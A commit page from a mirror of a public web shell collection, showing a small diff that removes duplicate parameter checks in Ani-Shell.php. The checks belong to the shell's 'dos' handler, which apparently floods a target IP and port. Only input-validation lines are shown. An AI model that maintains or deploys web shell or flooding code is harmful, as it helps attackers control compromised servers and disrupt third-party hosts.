1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Merge pull request #16 from kilida/patch-1

Repeated subexpressions in Ani-Shell.php
This commit is contained in:
tennc
2016-06-24 12:56:21 +08:00
committed by GitHub

View File

@@ -1939,12 +1939,10 @@ else if(isset($_GET['dos']))
isset($_GET['exTime']) &&
isset($_GET['port']) &&
isset($_GET['timeout']) &&
isset($_GET['exTime']) &&
$_GET['exTime'] != "" &&
$_GET['port'] != "" &&
$_GET['ip'] != "" &&
$_GET['timeout'] != "" &&
$_GET['exTime'] != ""
$_GET['timeout'] != ""
)
{
$IP=$_GET['ip'];